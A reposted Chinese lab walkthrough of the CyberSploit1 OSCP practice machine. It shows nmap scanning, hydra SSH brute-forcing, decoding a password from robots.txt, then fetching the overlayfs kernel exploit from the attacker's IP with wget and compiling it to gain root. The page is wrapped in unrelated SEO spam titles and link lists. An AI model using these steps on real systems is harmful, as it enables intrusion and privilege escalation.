当前位置: 首页 > news >正文 企业网站程序下载舆情监测软件免费版 news 2025/10/24 14:11:41 企业网站程序下载,舆情监测软件免费版,大连网站排名优,网站如何做友情链接OSCP系列靶场-Esay-CyberSploit1 总结 getwebshell → 源码注释发现用户名 → robots.txt发现base64密码 → SSH登录 提 权 思 路 → 内网信息收集 → 发现发行版本有点老 → 内核overlayfs提权 准备工作 启动VPN 获取攻击机IP 192.168.45.220 启动靶机 获取目标机器I…OSCP系列靶场-Esay-CyberSploit1 总结 getwebshell → 源码注释发现用户名 → robots.txt发现base64密码 → SSH登录 提 权 思 路 → 内网信息收集 → 发现发行版本有点老 → 内核overlayfs提权 准备工作 启动VPN 获取攻击机IP 192.168.45.220 启动靶机 获取目标机器IP 192.168.176.92 信息收集-端口扫描 目标开放端口收集 Nmap开放端口扫描2次 ┌──(root㉿Kali)-[/home/bachang/CyberSploit1] └─# ┌──(root㉿Kali)-[/home/bachang/Blogger] └─# sudo nmap --min-rate 10000 -p- 192.168.176.92 Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-23 11:45 CST Nmap scan report for 192.168.176.92 Host is up (0.30s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds 通过两次收集到的端口:→22,80 目标端口对应服务探测 # tcp探测 sudo nmap -sT -sV -O -sC -p22,80 192.168.176.92 信息收集-端口测试 两个端口的话通常突破口在80端口 22-SSH端口的信息收集 22-SSH端口版本信息与MSF利用(待定) 通过Nmap探测获得SSH的版本信息可以尝试利用 # 进入msf # 探测版本为OpenSSH 5.9p1 Debian 5ubuntu1.10 msfconsole # 搜索对应脚本 msf6 searchsploit OpenSSH 5.9p1 貌似存在用户枚举等没思路的时候可以来试试 22-SSH手动登录尝试(失败) 尝试root账户的密码爆破 ssh root192.168.176.92 -p 22 # 密码尝试 password gt; root 22-SSH弱口令爆破(挂着干别的) 尝试root账户的密码爆破利用工具hydra线程-t为6 1.hydra -l root -P /usr/share/wordlists/metasploit/password.lst -t 6 -vV 192.168.176.92 ssh -s 22 80-HTTP端口的信息收集 访问 http://192.168.176.92/ 发现不是一个标准的CMS从源码查看开始 信息收集-源码查看 # 包括文章中是否写明一些敏感信息 curl http://192.168.176.92:80 收集到一个用户名信息 itsskv 信息收集-目录扫描 信息收集-目录扫描初步 dirsearch -u http://192.168.176.92:80 -x 302,403 因为扫出了目录深层次的扫描待选 信息收集-目录扫描(后缀) 信息收集-目录扫描(深度/大字典) 信息收集-目录扫描(深度/大字典后缀) 信息收集-目录访问 /robots.txt端点访问 存在一串代码推测是加密带等号尝试用bashe64解密 1.Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0 base64解密 利用kali解密得到了内容确认是base64加密 ┌──(root㉿Kali)-[/home/bachang/Blogger] └─# echo Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0 | base64 -d cybersploit{youtube.com/c/cybersploit} 另外两个端点没东西 漏洞利用-getwebshell 信息泄露getwebshell 已知用户名 itsskv 和 cybersploit{youtube.com/c/cybersploit} 头脑风暴一下密码会不会和cybersploit{youtube.com/c/cybersploit}有关 之前hyrda可以爆破说明22端口是允许账号密码登录的 22-SSH账号密码登录(成功) 获取账号密码之后利用SSH进行登录 ssh itsskvspan192.168.176.92/span -p22 password gt; cybersploit (失败) password gt; cybersploit{youtube.com/c/cybersploit}(成功) 密码真长我真的会谢 内网遨游-getshell FLAG1获取 # 有2个理论上排除掉第一个找home下 itsskvspancybersploit-CTF/span:~$ find / -name local.txt 2gt;/dev/null /usr/share/checkbox/jobs/local.txt /home/itsskv/local.txt itsskvspancybersploit-CTF/span:~$ cat /home/itsskv/local.txt ********************* 信息收集-内网基础信息收集 在获取shell之后我们要进行内网信息的收集都是为了提权做准备 检测操作系统的发行版本 # 确定发行版本 较老 itsskvspancybersploit-CTF/span:~$ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 12.04.5 LTS Release: 12.04 Codename: precise 查看内核版本信息 # 确定内核版本 itsskvspancybersploit-CTF/span:~$ uname -a Linux cybersploit-CTF 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 athlon i386 GNU/Linux 确认home目录下用户 itsskvspancybersploit-CTF/span:~$ ls -al /home total 16 # 有两个用户 drwxr-xr-x 22 cybersploit cybersploit 4096 Sep 4 2020 cybersploit drwxr-xr-x 20 itsskv itsskv 4096 Sep 4 2020 itsskv 确认home目录下是否有隐藏文件 # 例如.ssh找密码 ./*_history找历史记录等 itsskvspancybersploit-CTF/span:~$ ls -al /home/itsskv # 查看了一下没啥 drwxr-xr-x 20 itsskv itsskv 4096 Sep 4 2020 . drwxr-xr-x 4 root root 4096 Jun 25 2020 .. -rw------- 1 itsskv itsskv 0 Sep 4 2020 .bash_history -rw-r--r-- 1 itsskv itsskv 220 Jun 25 2020 .bash_logout -rw-r--r-- 1 itsskv itsskv 3486 Jun 25 2020 .bashrc drwx------ 14 itsskv itsskv 4096 Jun 25 2020 .cache drwx------ 9 itsskv itsskv 4096 Jun 25 2020 .config 权限提升 Linux提权-内核overlayfs提权尝试 因为发行版本较老若存在以下情况进行overlayfsLinux Kernel Version提权 系统版本Linux Kernel Version大于3.13.0小于3.19UbuntuLinux 15.04UbuntuLinux 14.10UbuntuLinux 14.10UbuntuLinux 12.04 漏洞利用-内核overlayfs提权 msfconsole msf gt; searchsploit overlayfs 结合 3.13.0-32的版本信息选择2与3 # 如果想查看msf对应的内容 cat /usr/share/exploitdb/exploits/linux/local/37292.c 将文件保存在当前目录下方便开启http服务 ┌──(root㉿Kali)-[/home/bachang/CyberSploit1] └─# cp /usr/share/exploitdb/exploits/linux/local/37292.c ./shell.c ┌──(root㉿Kali)-[/home/bachang/CyberSploit1] └─# ls hydra.restore shell.c 攻击机开启服务 1.sudo python3 -m http.server 80 目标机器 # 首先到具有权限的目录下 如/tmp itsskvspancybersploit-CTF/span:~$ cd /tmp # 下载 itsskvspancybersploit-CTF/span:/tmp$ wget http://192.168.45.220/shell.c # 给权限 itsskvspancybersploit-CTF/span:/tmp$ chmod x shell.c # 如果是c的需要进行编译 itsskvspancybersploit-CTF/span:/tmp$ gcc shell.c -o shell.c # 运行 itsskvspancybersploit-CTF/span:/tmp$ ./shell.c spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library # whoami root 提权成功 FLAG2获取 # cat /root/proof.txt ********************* 完结撒花~~~ 原文地址: https://bbs.zkaq.cn/t/30873.html 文章转载自: http://www.morning.fgppj.cn.gov.cn.fgppj.cn http://www.morning.jfqqs.cn.gov.cn.jfqqs.cn http://www.morning.lthtp.cn.gov.cn.lthtp.cn http://www.morning.lnbyk.cn.gov.cn.lnbyk.cn http://www.morning.ylkkh.cn.gov.cn.ylkkh.cn http://www.morning.zymgs.cn.gov.cn.zymgs.cn http://www.morning.gfrjs.cn.gov.cn.gfrjs.cn http://www.morning.krtcjc.cn.gov.cn.krtcjc.cn http://www.morning.xfxnq.cn.gov.cn.xfxnq.cn http://www.morning.bgbnc.cn.gov.cn.bgbnc.cn http://www.morning.fjtnh.cn.gov.cn.fjtnh.cn http://www.morning.kjyqr.cn.gov.cn.kjyqr.cn http://www.morning.wfhnz.cn.gov.cn.wfhnz.cn http://www.morning.wqbrg.cn.gov.cn.wqbrg.cn http://www.morning.yyngs.cn.gov.cn.yyngs.cn http://www.morning.prmbb.cn.gov.cn.prmbb.cn http://www.morning.wcqxj.cn.gov.cn.wcqxj.cn http://www.morning.pjftk.cn.gov.cn.pjftk.cn http://www.morning.lrylj.cn.gov.cn.lrylj.cn http://www.morning.qtkdn.cn.gov.cn.qtkdn.cn http://www.morning.bzlgb.cn.gov.cn.bzlgb.cn http://www.morning.rjmd.cn.gov.cn.rjmd.cn http://www.morning.jlrym.cn.gov.cn.jlrym.cn http://www.morning.jjxxm.cn.gov.cn.jjxxm.cn http://www.morning.ljhnn.cn.gov.cn.ljhnn.cn http://www.morning.mlzyx.cn.gov.cn.mlzyx.cn http://www.morning.xpqdf.cn.gov.cn.xpqdf.cn http://www.morning.mdfxn.cn.gov.cn.mdfxn.cn http://www.morning.dxhnm.cn.gov.cn.dxhnm.cn http://www.morning.lrwsk.cn.gov.cn.lrwsk.cn http://www.morning.yrdt.cn.gov.cn.yrdt.cn http://www.morning.wwwghs.com.gov.cn.wwwghs.com http://www.morning.qxycf.cn.gov.cn.qxycf.cn http://www.morning.cpqwb.cn.gov.cn.cpqwb.cn http://www.morning.qrqcr.cn.gov.cn.qrqcr.cn http://www.morning.dkzrs.cn.gov.cn.dkzrs.cn http://www.morning.bsrqy.cn.gov.cn.bsrqy.cn http://www.morning.ygwbg.cn.gov.cn.ygwbg.cn http://www.morning.ybqlb.cn.gov.cn.ybqlb.cn http://www.morning.bqpg.cn.gov.cn.bqpg.cn http://www.morning.wbxbj.cn.gov.cn.wbxbj.cn http://www.morning.mzmqg.cn.gov.cn.mzmqg.cn http://www.morning.ptqds.cn.gov.cn.ptqds.cn http://www.morning.wrkcw.cn.gov.cn.wrkcw.cn http://www.morning.bwfsn.cn.gov.cn.bwfsn.cn http://www.morning.tfei69.cn.gov.cn.tfei69.cn http://www.morning.lzrpy.cn.gov.cn.lzrpy.cn http://www.morning.jzkqg.cn.gov.cn.jzkqg.cn http://www.morning.krywy.cn.gov.cn.krywy.cn http://www.morning.tqpr.cn.gov.cn.tqpr.cn http://www.morning.tmlhh.cn.gov.cn.tmlhh.cn http://www.morning.dwmtk.cn.gov.cn.dwmtk.cn http://www.morning.fbzyc.cn.gov.cn.fbzyc.cn http://www.morning.btns.cn.gov.cn.btns.cn http://www.morning.dtzsm.cn.gov.cn.dtzsm.cn http://www.morning.gzzxlp.com.gov.cn.gzzxlp.com http://www.morning.tztgq.cn.gov.cn.tztgq.cn http://www.morning.xsqbx.cn.gov.cn.xsqbx.cn http://www.morning.kehejia.com.gov.cn.kehejia.com http://www.morning.pprxs.cn.gov.cn.pprxs.cn http://www.morning.wqtzs.cn.gov.cn.wqtzs.cn http://www.morning.bqpgq.cn.gov.cn.bqpgq.cn http://www.morning.ssjtr.cn.gov.cn.ssjtr.cn http://www.morning.wfqcs.cn.gov.cn.wfqcs.cn http://www.morning.xhkgl.cn.gov.cn.xhkgl.cn http://www.morning.rfljb.cn.gov.cn.rfljb.cn http://www.morning.czzpm.cn.gov.cn.czzpm.cn http://www.morning.qpsdq.cn.gov.cn.qpsdq.cn http://www.morning.ysybx.cn.gov.cn.ysybx.cn http://www.morning.mqbdb.cn.gov.cn.mqbdb.cn http://www.morning.ttfh.cn.gov.cn.ttfh.cn http://www.morning.zrgdd.cn.gov.cn.zrgdd.cn http://www.morning.ppqzb.cn.gov.cn.ppqzb.cn http://www.morning.qttg.cn.gov.cn.qttg.cn http://www.morning.bpttm.cn.gov.cn.bpttm.cn http://www.morning.080203.cn.gov.cn.080203.cn http://www.morning.hrydl.cn.gov.cn.hrydl.cn http://www.morning.wpspf.cn.gov.cn.wpspf.cn http://www.morning.jhrqn.cn.gov.cn.jhrqn.cn http://www.morning.gfkb.cn.gov.cn.gfkb.cn 查看全文 http://www.tj-hxxt.cn/news/245531.html 相关文章: 营销型网站建设实战》营销型网站建设培训 外国旅游网站建设现状wordpress卢松松主题 建立一个网站需要人员企业网站诊断与优化方案 网站优化三要素阳江网梁国燊事件 只放一个图片做网站第三方公司做网站价格 网站需要更新的频率搜索引擎优化实验报告 网站开发简介浙江联科网站建设 沧州网站建设的技术方案网站推广方法素材 泸州网站开发郑州新闻百度 南京快速建站模板下载html制作一个简单美食网页 物流行业网站源码wordpress 取中等大小 网站建设与管理技术实训教程pdf如何在建设银行网站预约纪念币 怎么做二维码网站苏州网络公司哪个最好 网站群建设进度做消费金融网站价格 扬州立扬计算机培训网站建设怎么样厦门网站建设门户 学前端要逛那些网站搜索引擎原理 寿光网站建设定制wordpress 数据库索引 福鼎市建设局网站台州网站制作案例 阜阳公司做网站wordpress category id 做网站昆山wordpress 下载页面 easyui 网站设计wordpress菜单子菜单 找别人做网站需要注意什么织梦新闻模板 做百度排名推广有哪些网站高端企业网站建设核心 哪些网站可以发广告wordpress做成论坛 做分析图的网站网站大改版 北京微信网站制作电话美橙网站建设教程 使用动易模版制作网站网站 被刷流量 瑞安外贸网站制作wordpress 建的网站吗 自己做的小网站如何发布青羊区建设和交通网站 网站开发兼容ie电脑网页游戏大全
